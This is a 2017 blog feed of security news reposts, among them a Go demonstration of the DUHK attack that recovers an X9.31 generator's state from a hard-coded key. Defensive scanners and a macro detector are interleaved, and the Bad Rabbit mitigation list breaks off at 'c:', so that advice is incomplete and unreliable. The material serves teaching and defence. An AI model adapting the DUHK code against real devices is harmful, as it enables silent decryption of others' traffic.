Updates from December, 2017

  • jkabtech 4:17 am on December 12, 2017
    Tags: anti-malware, Canadian, spooks

    Canadian govt spooks open source anti-malware analytics tool 

    Follows Five Eyes partner agencies.

    Canada’s main signals intelligence agency has released the code for a malware scanner and analytics tool as open source. 

    The Communications Security Establishment (CSE) said the AssemblyLine tool is designed to analyse large volumes of files, and can automatically rebalance workloads.

    Each file is tagged with a unique identifier, and passed through user-defined analytics engines that attempt to assess how malicious the code is, with a score assigned for that purpose.

    It can use popular anti-virus engines such as McAfee, Kaspersky, F-Secure and BitDefender, and can also connect to the VirusTotal aggregate scanning service using an API key, among other services.

    Files that are identified as malicious can be passed to other defensive systems, the CSE said.

    The intention behind AssemblyLine is to free up analysts from having to manually inspect most files, allowing them instead to focus on incoming malware.
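    To make the pipeline concrete, the following Go program is an added example written for this page; it is not AssemblyLine's code and does not reproduce its engines. It tags a file with its SHA-256 hash as the unique identifier, runs it through two user-defined engines (a Shannon-entropy check and a byte-signature match against a constructed marker, neither of them a real detection), sums their scores and applies a threshold to decide whether the file is handed on to other defensive systems.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"math"
)

// Engine is one user-defined analytic. It inspects a file's bytes and returns
// a score contribution; zero means "nothing suspicious seen".
type Engine interface {
	Name() string
	Score(data []byte) int
}

// entropyEngine flags payloads whose Shannon entropy is close to 8 bits/byte,
// the usual signature of packed or encrypted content.
type entropyEngine struct{}

func (entropyEngine) Name() string { return "entropy" }

func (entropyEngine) Score(data []byte) int {
	if len(data) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range data {
		counts[b]++
	}
	h := 0.0
	for _, c := range counts {
		if c == 0 {
			continue
		}
		p := float64(c) / float64(len(data))
		h -= p * math.Log2(p)
	}
	if h > 7.0 {
		return 300
	}
	return 0
}

// patternEngine matches a byte signature. The signature used below is a
// constructed marker for this example, not a real malware signature.
type patternEngine struct {
	sig   []byte
	score int
}

func (patternEngine) Name() string { return "pattern" }

func (e patternEngine) Score(data []byte) int {
	if bytes.Contains(data, e.sig) {
		return e.score
	}
	return 0
}

// Verdict is what the pipeline hands to downstream systems.
type Verdict struct {
	ID        string         // SHA-256 of the content: the unique identifier
	Scores    map[string]int // per-engine contributions
	Total     int
	Malicious bool // Total >= threshold
}

// DefaultEngines is the engine set used by the demo.
func DefaultEngines() []Engine {
	return []Engine{entropyEngine{}, patternEngine{sig: []byte("EXAMPLE-MARKER"), score: 500}}
}

// Analyse tags the file, runs every engine, sums the scores and applies the threshold.
func Analyse(data []byte, engines []Engine, threshold int) Verdict {
	sum := sha256.Sum256(data)
	v := Verdict{ID: hex.EncodeToString(sum[:]), Scores: map[string]int{}}
	for _, e := range engines {
		s := e.Score(data)
		v.Scores[e.Name()] = s
		v.Total += s
	}
	v.Malicious = v.Total >= threshold
	return v
}

// SampleMalicious builds a constructed "packed" sample: 4 KiB of LCG noise
// (high entropy) with the marker embedded. It is not malware.
func SampleMalicious() []byte {
	out := make([]byte, 0, 4096+16)
	x := uint32(12345)
	for i := 0; i < 4096; i++ {
		x = x*1664525 + 1013904223
		out = append(out, byte(x>>24))
	}
	return append(out, []byte("EXAMPLE-MARKER")...)
}

func main() {
	for _, sample := range [][]byte{[]byte("plain text report, nothing to see\n"), SampleMalicious()} {
		v := Analyse(sample, DefaultEngines(), 500)
		fmt.Printf("%s... total=%d malicious=%v %v\n", v.ID[:12], v.Total, v.Malicious, v.Scores)
	}
}
```

    The scores and the threshold are arbitrary here; the point is the shape: identifier, independent engines, additive score, one decision point that downstream systems consume.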

    By releasing it as free and open source software, the CSE hopes the infosec community will further develop the tool and create new methods of detecting malicious files.

    The source code for AssemblyLine can be found on Atlassian’s Bitbucket repository for registered users.

    AssemblyLine was built with public domain and open source software by the CSE, with no commercial, proprietary technology. 

    The US National Security Agency (NSA) has also publicly released several infosec tools, including Security-Enhanced Linux (SELinux), which is widely used.

    Britain’s Government Communications Headquarters (GCHQ) also releases tools to the public, and maintains a code repository on Github for that purpose.

  • jkabtech 8:17 pm on December 11, 2017
    Tags: Govpass, undecided

    DTA undecided on sole identity provider for Govpass 

    Yet to task single agency with responsibility.

    The Digital Transformation Agency is yet to decide which agency will be entrusted as the federal government’s sole identity provider for the whole-of-gov Govpass digital identity platform even as testing of the new verifier begins.

    The decision to select a single identity provider at the federal level was revealed earlier this year, despite criticism from stakeholders who viewed the centralised model as reminiscent of the failed Australia Card proposal.

    One of the reasons the DTA gave for this in Govpass’ initial privacy impact assessment was that it would allow security efforts to be focused in “one place instead of having to fund separate teams maintaining multiple instances”.

    The single provider of identity for government would be responsible for new digital identities as well as existing ones that would be migrated across from other services.

    It would use the identity exchange technology built by the DTA, dubbed the ‘Exchange Hub’, to allow other agencies to verify details about a citizen’s identity without accumulating personal data.

    However, while the agency has not altered its approach in the intervening months, a spokesperson told iTnews no decision had yet been made on who would become the government’s single identity provider.

    But it has whittled the choice down to the ATO and DHS – who both already provide whole-of-government identity services – as well as the Attorney-General’s Department and Department of Industry, Innovation and Science, which the agency says it is working closely with on the “next steps” of the digital identity platform.

    The ATO has already begun testing Govpass on its new online tax file number application service – a process that is currently only possible by visiting an Australia Post or Centrelink shopfront or by posting documents to the ATO, and takes around 40 days to complete.

    The digital identity is also understood to be under testing with a small number of other services, but the DTA spokesperson would not provide detail. The agency will use the private beta phase to add new features and functionality to the platform, while fixing any issues and integrating it with other services.

    Several state government agencies and private sector entities are also expected to add to Govpass, and Australia Post has indicated it will seek accreditation to be the first identity provider outside of the Commonwealth, the DTA spokesperson revealed.

    AusPost partnered with the DTA in May to tack its Digital ID identity verification service onto Govpass.

    How Govpass will work

    A first look at how citizens will apply for the optional digital identity was outlined in a DTA video last week, which showcased the front-end of what will replace the more than 30 separate logins currently used to access federal government digital services.

    “I would like to see a point where we can do away with all those usernames and passwords, that need to continue to be updated, when you login to a service,” digital transformation minister Angus Taylor said.

    Govpass will require citizens to provide either a birth certificate, passport or drivers licence and a Medicare card – or the same documentation required for a 100 point identity check – in addition to completing a two-factor authentication process to confirm their identity.

    The personal documents are verified in real time with the department that has responsibility for the credential – such as the Department of Human Services for Medicare cards and the Department of Foreign Affairs and Trade for passports – using the document verification service.

    Govpass will also be capable of accessing the camera on a user’s device to confirm the image against a passport or drivers licence using the one-to-one image matching service known as the face verification service (FVS).

    This will include liveness tests to prevent an individual using another person’s photograph, the DTA spokesperson said.

    The government also expects the digital identity to be used to access services at other levels of government as well as within the private sector over time.

  • jkabtech 12:17 pm on December 11, 2017
    Tags: copycat

    New Mirai copycat IoT botnet spreading 

    Code being actively modified.

    Security researchers have warned that a new worm attacking internet-connected and vulnerable devices is currently spreading throughout the world.

    Dubbed IoT_reaper by Chinese security vendor Qihoo 360, the malware was first spotted in September this year and has been spreading since then.

    The vendor said it had found more than 10,000 unique IP addresses per day with devices that have been compromised by the malware, along with more than two million systems queued at the command and control servers Qihoo 360 is tracking.

    The malware is based on the Mirai internet of things (IoT) worm that struck last year, and which has been used to compromise millions of unpatched, vulnerable devices connected to the internet around the world.

    However, IoT_reaper differs from Mirai in that it doesn’t attempt to crack weak device passwords – it only tries to exploit vulnerabilities.

    It also doesn’t exhibit aggressive scanning so as to stay unnoticed, and it comes with an execution environment for the lightweight Lua scripting language so as to enable more complex attacks, the researchers said.

    IoT_reaper attacks vulnerable devices from D-Link, Netgear, Linksys, AVTech, Vacron, JAWS and GoAhead.

    The researchers said they have not seen the IoT_Reaper botnet being used for denial of service attacks as with Mirai.

    It does, however, contain around 100 domain name system resolvers, which can be used for DDoS amplification attacks. 

  • jkabtech 4:17 am on December 11, 2017
    Tags: APNIC, credentials, resets, spill, whois

    APNIC resets passwords after whois credentials spill 

    Accidentally published hashed passwords.

    APNIC, the regional internet registry for the Asia Pacific region, has been forced to reset all passwords for objects in its whois database after a technical error leaked hashed authentication credentials.

    APNIC upgraded its whois database – which carries information about organisations and people who have been allocated internet-numbered networks, and who can alter the data published in it – in June this year. 

    In the process, APNIC accidentally included hashed authentication details for the whois Maintainer and Incident Response Team (IRT) objects in the database in the downloadable data feed the registry publishes.

    But the passwords were hashed with relatively weak cryptographic methods such as the UNIX crypt-pw scheme, which uses only the first eight characters of a password. APNIC admitted there was a “possibility that passwords could have been derived from the hash if a malicious actor had the right tools”.

    If an attacker had cracked the hashes and obtained the passwords for the objects in the database, they could have altered whois details and temporarily re-routed IP-numbered networks from their owners.
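    As a check that a resource holder, or a red team, can run over a published bulk feed, the Go program below is an added example and not APNIC's tooling. It parses a constructed RPSL excerpt (the object names and hash values are placeholders) and flags every auth: attribute carrying a CRYPT-PW or MD5-PW value, the schemes whose values are password-derived, while leaving PGP/X.509 key references and redacted values alone.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding records one auth: attribute whose value is password-derived and
// therefore must never appear in a published data feed.
type Finding struct {
	Object string // "type: name" of the RPSL object
	Scheme string // CRYPT-PW or MD5-PW
	Note   string
}

// Password-hash schemes used in RPSL auth: attributes. Public-key schemes
// (PGPKEY-..., X509-...) carry no secret and are left alone.
var secretSchemes = map[string]string{
	"CRYPT-PW": "DES crypt(3): only the first 8 password characters count, cheap to brute force",
	"MD5-PW":   "md5-crypt: fast to crack offline",
}

// ScanDump splits an RPSL dump into objects (blank-line separated) and reports
// every auth: attribute that leaks hash material.
func ScanDump(dump string) []Finding {
	var findings []Finding
	dump = strings.ReplaceAll(dump, "\r\n", "\n")
	for _, obj := range strings.Split(dump, "\n\n") {
		obj = strings.TrimSpace(obj)
		if obj == "" {
			continue
		}
		lines := strings.Split(obj, "\n")
		typ, name, _ := strings.Cut(lines[0], ":")
		object := strings.TrimSpace(typ) + ": " + strings.TrimSpace(name)
		for _, l := range lines {
			key, val, ok := strings.Cut(l, ":")
			if !ok || strings.TrimSpace(key) != "auth" {
				continue
			}
			scheme, _, _ := strings.Cut(strings.TrimSpace(val), " ")
			scheme = strings.ToUpper(scheme)
			if note, leaks := secretSchemes[scheme]; leaks {
				findings = append(findings, Finding{Object: object, Scheme: scheme, Note: note})
			}
		}
	}
	return findings
}

// SampleDump is a constructed excerpt in the shape of a whois bulk feed. The
// hashes are placeholders, not real credentials; the third object shows the
// redacted form a public feed should carry.
const SampleDump = `mntner:         MAINT-EXAMPLE-AP
descr:          constructed maintainer object
auth:           CRYPT-PW abXYZ123456ab
auth:           MD5-PW $1$saltsalt$placeholderplaceholde
mnt-by:         MAINT-EXAMPLE-AP
source:         EXAMPLE

irt:            IRT-EXAMPLE-AP
auth:           PGPKEY-0123ABCD
mnt-by:         MAINT-EXAMPLE-AP
source:         EXAMPLE

mntner:         MAINT-REDACTED-AP
auth:           # Filtered
source:         EXAMPLE
`

func main() {
	for _, f := range ScanDump(SampleDump) {
		fmt.Printf("%s leaks %s (%s)\n", f.Object, f.Scheme, f.Note)
	}
}
```

    Run against a real feed, any finding at all is the incident: the hash type only decides how fast the cracking goes.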

    The error was only discovered this month after security researchers from eBay’s red team reported it to APNIC.

    APNIC removed the passwords from the whois data feed and reset all Maintainer and IRT passwords earlier this month.

    The registry continues to analyse its log files for network resource holder activity, and said it has not found evidence of any irregularities. 

    There is no connection between the whois Maintainer and IRT resource objects credentials leak and MyAPNIC portal login credentials; users of the latter do not need to reset their passwords.

  • jkabtech 8:17 pm on December 10, 2017
    Tags: fights, promise, siege, transparency

    Kaspersky, under siege, fights back with transparency promise 

    Will allow independent reviews of code and business processes.

    Kaspersky Lab has announced a ‘global transparency initiative’ aimed at countering allegations the security vendor is secretly assisting Russian authorities with cyber surveillance.

    The initiative promises independent reviews of product source code, software updates, software development lifecycles, and supply chain risk mitigation strategies.

    It follows reports that Israeli counter-intelligence agencies discovered Russian spies used Kaspersky software for surveillance purposes.

    In September Kaspersky Lab products were banned from use in US government agencies, amidst concerns over Kremlin interference with the Russian security vendor.

    Kaspersky has strenuously denied that it has acted on behalf of any government.

    It has fought back to dispel the mistrust created by the allegations, which it claims have been made for political reasons.

    Founder and chief executive Eugene Kaspersky today said the transparency initiative sought to repair the damage done by the allegations to his business.

    “Cybersecurity has no borders, but attempts to introduce national boundaries in cyberspace are counterproductive and must be stopped,” he said.

    “We need to reestablish trust in relationships between companies, governments and citizens.”

    Apart from the independent code and business process reviews – which will take place in the first quarter of next year – Kaspersky is also committing to developing additional controls for its telemetry and data gathering practices.

    Three Kaspersky ‘transparency centres’ will be set up globally from next year in Asia, Europe and the United States.

    These will allow trusted Kaspersky partners to review the company’s source code, its software updates, and threat detection rules.

    Kaspersky will also bump up its bug bounty rewards to US$100,000 (A$128,000) for the worst vulnerabilities found by researchers in its products before the end of this year.

  • jkabtech 12:17 pm on December 10, 2017
    Tags: flyer

    NATO cyber conference flyer used as phishing bait 

    “Fancy Bear” APT targets high-ranking officials.

    Nation-state actors are attempting to plant malware on targets’ computers via an invitation to a NATO-organised cyber security conference, researchers have found.

    Cisco’s Talos security research division discovered a new phishing campaign from advanced persistent threat (APT) actors Group 74 – also known as Fancy Bear, APT28, Sofacy and Tsar Team – containing a malicious Microsoft Word document.

    Talos said the document contains information about the CyCon US conference on cyber conflict in Washington DC, copied from the meeting’s official website. CyCon is held by the US Army’s Cyber Institute and the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE).

    The document was sent out to specific targets, Talos said, and contains a macro written in Visual Basic for Applications (VBA), but no Office exploits or zero-days.

    If executed, the VBA macro attempts to drop and run a new variant of the Seduploader malware on targets’ machines.

    Seduploader is a “reconnaissance malware” that has been used by Group 74/Fancy Bear for several years.

    The malware can take screenshots, capture and exfiltrate data and system configuration information, run code, and download files.

    “This is clearly an attempt to exploit the credibility of Army Cyber Institute and NATO CCDCOE in order to target high-ranking officials and experts of cyber security,” the NATO CCDCOE said.

    It warned users not to enable and run Office macros, and to handle information obtained and received via the internet with special care.
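    As a triage check for the kind of document described above, the Go program below is an added example and not Talos’ or NATO CCDCOE’s tooling. It opens an OOXML file as the zip container it is and reports whether a vbaProject.bin part is present and whether [Content_Types].xml declares the VBA content type, keying on the parts rather than the file extension. The sample document is constructed in memory with a placeholder VBA part; it contains no real macro, and the check only answers “does this file carry a VBA project?”, not what the macro does.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"io"
	"strings"
)

// MacroReport is the triage answer for an OOXML (docx/docm/xlsm/pptm) file.
type MacroReport struct {
	HasVBAProject bool     // a vbaProject.bin part is present
	VBAParts      []string // where it lives (e.g. word/vbaProject.bin)
	DeclaredType  bool     // [Content_Types].xml maps a part to the vbaProject content type
}

const vbaContentType = "application/vnd.ms-office.vbaProject"

// InspectOffice opens the document as the zip container it is and looks for
// the VBA project part. It keys on the parts, not on the file extension.
func InspectOffice(data []byte) (MacroReport, error) {
	zr, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if err != nil {
		return MacroReport{}, fmt.Errorf("not an OOXML container: %w", err)
	}
	var rep MacroReport
	for _, f := range zr.File {
		lower := strings.ToLower(f.Name)
		if strings.HasSuffix(lower, "vbaproject.bin") {
			rep.HasVBAProject = true
			rep.VBAParts = append(rep.VBAParts, f.Name)
		}
		if lower == "[content_types].xml" {
			rc, err := f.Open()
			if err != nil {
				return rep, err
			}
			body, err := io.ReadAll(rc)
			rc.Close()
			if err != nil {
				return rep, err
			}
			rep.DeclaredType = bytes.Contains(body, []byte(vbaContentType))
		}
	}
	return rep, nil
}

// BuildSample constructs a minimal OOXML container in memory for the demo.
// With macro=true it adds a placeholder vbaProject.bin (not real VBA bytecode).
func BuildSample(macro bool) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	ct := `<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>`
	if macro {
		ct += "\n  <Override PartName=\"/word/vbaProject.bin\" ContentType=\"" + vbaContentType + "\"/>"
	}
	ct += "\n</Types>"
	parts := map[string]string{
		"[Content_Types].xml": ct,
		"word/document.xml":   `<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p><w:r><w:t>conference invitation (constructed)</w:t></w:r></w:p></w:body></w:document>`,
	}
	if macro {
		parts["word/vbaProject.bin"] = "placeholder-for-compound-file-vba-project"
	}
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			panic(err)
		}
		w.Write([]byte(body))
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	for _, macro := range []bool{false, true} {
		rep, err := InspectOffice(BuildSample(macro))
		fmt.Printf("macro=%v -> %+v err=%v\n", macro, rep, err)
	}
}
```

    A positive result is the cue to hand the file to a proper macro extractor and a sandbox; a negative result from this check says nothing about exploits in the document body, which Talos noted were absent in this campaign anyway.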

  • jkabtech 4:17 am on December 10, 2017
    Tags: Fortinet, recovers

    DUHK attack recovers secret keys from Fortinet devices 

    “Absurd” flaw in government-certified crypto.

    Cryptographers have devised an attack that allows the recovery of secret digital keys from network devices and therefore full, silent interception of traffic.

    Researchers Shaanan Cohney and Nadia Heninger of the University of Pennsylvania, and Matthew Green of Johns Hopkins University, found that devices using the American National Standards Institute X9.31 pseudo-random number generator (PRNG) can be reliably attacked to recover the keys used to encrypt communications.

    Although deprecated since 2016, X9.31 is still used in government-certified hardware.

    The attack – dubbed Don’t Use Hard-coded Keys, or “DUHK” – works against devices in which the X9.31 seed key is hard-coded in the implementation of the PRNG.

    If the output from the PRNG is also used to directly generate the cryptographic keys, the device in question is vulnerable to the DUHK attack.

    The attack is passive and would not be noticed by victims.
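    The following Go program is an added example, not the researchers’ code, that shows why a hard-coded seed key is fatal for this generator. It implements the X9.31 construction with AES-128 (the standard also allows 3DES) and then plays the attacker: knowing only the key K, two consecutive output blocks and their timestamps to within a couple of hundred microseconds, it recovers the internal state and predicts the next output, which is exactly what is needed when that output becomes a session key. The layout of the date/time vector and the key bytes are assumptions for the demo.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

const bs = 16 // AES block size; X9.31 is also specified for 3DES with 8-byte blocks

type block [bs]byte

func xor(a, b block) (o block) {
	for i := range a {
		o[i] = a[i] ^ b[i]
	}
	return
}

func enc(c cipher.Block, in block) (o block) {
	c.Encrypt(o[:], in[:])
	return
}

// dt packs a microsecond timestamp into the date/time vector. The layout is
// an assumption for this example; real implementations pack time differently.
func dt(usec uint64) (d block) {
	binary.BigEndian.PutUint64(d[:8], usec)
	return
}

// X931 is the ANSI X9.31 generator: I = E_K(DT); R = E_K(I xor V); V' = E_K(R xor I).
type X931 struct {
	c cipher.Block
	V block
}

func NewX931(key []byte, seed block) *X931 {
	c, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	return &X931{c: c, V: seed}
}

// Next produces one output block for the given timestamp and advances V.
func (g *X931) Next(usec uint64) block {
	I := enc(g.c, dt(usec))
	R := enc(g.c, xor(I, g.V))
	g.V = enc(g.c, xor(R, I))
	return R
}

// Recover is the DUHK step. With K known (it is hard-coded in the firmware)
// and two consecutive outputs r1, r2 whose timestamps are known to within
// +/-window microseconds, it searches the timestamp space and returns the
// state V after r2. The seed V before r1 is never needed: V2 = E_K(r1 xor E_K(DT1)).
func Recover(key []byte, r1, r2 block, approx1, approx2, window uint64) (V block, t1, t2 uint64, ok bool) {
	c, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	for g1 := approx1 - window; g1 <= approx1+window; g1++ {
		V2 := enc(c, xor(r1, enc(c, dt(g1))))
		for g2 := approx2 - window; g2 <= approx2+window; g2++ {
			I2 := enc(c, dt(g2))
			if enc(c, xor(I2, V2)) == r2 { // guess confirmed against the second observed block
				return enc(c, xor(r2, I2)), g1, g2, true
			}
		}
	}
	return
}

// Predict computes the output the device will produce at time usec from the recovered state.
func Predict(key []byte, V block, usec uint64) block {
	c, _ := aes.NewCipher(key)
	return enc(c, xor(enc(c, dt(usec)), V))
}

// HardcodedKey stands in for the seed key baked into the firmware (constructed value).
var HardcodedKey = []byte("FIRMWARE-SEEDKEY")

func main() {
	var seed block
	if _, err := rand.Read(seed[:]); err != nil { // the device's secret V; the attacker never learns it
		panic(err)
	}
	dev := NewX931(HardcodedKey, seed)
	r1, r2, r3 := dev.Next(5_000_000), dev.Next(5_000_412), dev.Next(5_001_300)

	// Attacker: packet capture gives timestamps that are off by a few dozen microseconds.
	V, t1, t2, ok := Recover(HardcodedKey, r1, r2, 5_000_031, 5_000_390, 200)
	fmt.Printf("recovered=%v t1=%d t2=%d predicted r3 matches=%v\n", ok, t1, t2, Predict(HardcodedKey, V, 5_001_300) == r3)
}
```

    Note what the search costs: a window of a few hundred microseconds per timestamp is a few hundred thousand AES calls, and a fresh random seed V offers no protection because the first observed output already pins the state. Only a secret per-device K, or a different generator, closes the hole.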

    The researchers targeted Fortinet devices running the FortiOS 4.x operating system to test their attack. They found around 25,000 Fortinet devices are vulnerable to the DUHK attack.

    While recovering the keys is time-consuming – around four minutes per connection – the researchers said the attack was practical to carry out.

    They suggested developers stop using the X9.31 PRNG.

    Fortinet has patched its device firmware in later versions of FortiOS to remove the weak X9.31 PRNG.

  • jkabtech 8:17 pm on December 9, 2017
    Tags: Rabbit

    Is Bad Rabbit the new NotPetya? 

    Malware uses legit software to encrypt disks.

    A new strain of ransomware is working its way around the globe disguised as a fake Adobe Flash player update delivered as a drive-by download.

    Dubbed Bad Rabbit, the malware is based on the destructive NotPetya ransomware that struck earlier this year, according to Cisco’s Talos security researchers. NotPetya inflicted hundreds of millions in damages on companies including TNT Express and Maersk.

    However, major portions of the Bad Rabbit code have been rewritten, and the malware doesn’t appear to have supply chain attack capability, Talos said.

    Analysis by Google’s VirusTotal scanning system suggests the malware uses the legitimate Diskcryptor software to encrypt victims’ disks.

    The ransom to unlock the disks is set to 0.05 Bitcoin, equivalent to A$354.

    Bad Rabbit is currently spreading in Russia, Eastern Europe and Turkey.

    It can move laterally across networks and systems using a Server Message Block (SMB) module with a list of weak login credentials for brute-force guessing, as well as the mimikatz credential-stealing tool.

    The malware’s dropper, however, requires user interaction; victims need to click on the fake Flash update to start the installation.

    Security vendor ESET said Bad Rabbit had been used in an attack on major infrastructure in Ukraine, including the public transport metro in the capital Kiev. It said it had also identified Bad Rabbit infections in Japan and Bulgaria.

    The US Computer Emergency Readiness Team (US CERT) is warning users that it has received multiple reports of Bad Rabbit ransomware infections.

    According to security researcher Amit Serper, creating two files on a Windows computer’s file system appears to stop Bad Rabbit infections.

    They are:

    c:

  • jkabtech 12:17 pm on December 9, 2017
    Tags: ASD's, asked, mandate, strategies

    Govt asked to mandate ASD’s ‘essential eight’ cyber strategies 

    Resiliency failures lead to calls for more action.

    The federal government has been asked to require that all 180 corporate and non-corporate Commonwealth entities implement the ASD’s ‘essential eight’ cyber security strategies by June 2018.

    A joint committee asked today for a mandate from the government that all non-corporate entities – agencies and regulators – meet the Australian Signals Directorate’s revamped ASD ‘essential eight’ strategies unveiled earlier this year.

    The committee said it was concerned about lax adoption of the previous version of the standard, the ‘top four strategies to mitigate cyber security incidents’, despite the efficacy of the controls being well recognised in and out of government.

    Those concerns were heightened by an audit report earlier this year, which found Immigration and ATO did not comply with the ‘top four’ mitigation strategies.

    Immigration attributed its problems to complexity caused by machinery of government changes, while the ATO said it suffered compliance problems after a major IT outage.

    Both agencies have been asked to report compliance improvements to the joint committee of public accounts and audit.

    While seeking the mandate, the committee said it also noted concerns that compliance with the ‘top four’ mitigation strategies was a minimum standard and “does not necessarily equate to cyber resilience, particularly having regard to the fact that cyber resilience contemplates the likelihood that systems can and will fail”.

    “The committee considers that entities would benefit from clear guidance on the hallmarks of cyber resilience and notes that the Department of Prime Minister and Cabinet (PM&C) agreed to work with the Australian National Audit Office (ANAO) to better define these key features,” it said.

    “The committee recommends that in future audits on cyber security compliance, the ANAO outline the behaviours and practices it would expect in a cyber resilient entity, and assess against these.”

  • jkabtech 4:17 am on December 9, 2017

    ASIC skills up on data exfiltration via wi-fi 

    ‘Emerging’ vector for market crime.

    The Australian Securities and Investments Commission is investing in its capability to investigate “technology-related crime” such as unauthorised use of wi-fi to access or exfiltrate data.

    Outgoing ASIC chairman Greg Medcraft today said market crimes perpetrated with the aid of technology were an “emerging risk” and area of enforcement that the commission was looking at.

    “An emerging risk is technology-related crime where people will hack into a wireless network at a law firm to gain inside information and then potentially offer that for sale on the darknet,” Medcraft said.

    “This area of market crime is probably one that we really need to be on to going forward.”
